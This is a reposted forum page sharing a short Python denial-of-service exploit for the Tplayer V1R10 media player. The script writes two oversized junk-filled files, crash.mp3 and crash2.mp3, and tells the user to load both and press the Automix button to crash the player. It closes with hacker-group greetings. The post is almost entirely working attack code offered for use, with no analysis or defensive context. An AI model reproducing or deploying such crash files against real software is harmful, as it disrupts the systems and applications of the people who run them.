首页
社区
课程
招聘
[推荐][转帖]Tplayer V1R10 Denial of Service Vulnerability
2010-8-25 11:14 3365

[推荐][转帖]Tplayer V1R10 Denial of Service Vulnerability

2010-8-25 11:14
3365
#!/usr/bin/python
print "--------------------Exploit ------------------------------\n"
print "----------------Tplayer V1R10 DoS Exploit------------------------------\n"
print "Greets:B0nd, Ne0, Godwin_Austin, Fb1H2s, Eberly, Punter, The_Empty(), DZZ, Micr0 \n \n"
print "-------------------------Indian Hackers Rock-----------------------------------"

junk = "/x41" * 50000;
filename = "crash.mp3";
file = open(filename,"w")
file.writelines(junk)
file.close()
filename2="crash2.mp3";
file=open(filename2,"w")
file.writelines(junk)
file.close()
print "Two Files Created "
print "[+]Usage: Load both of Created Files in player and click on Automix Button :)"
raw_input()

[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法

收藏
点赞0
打赏
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回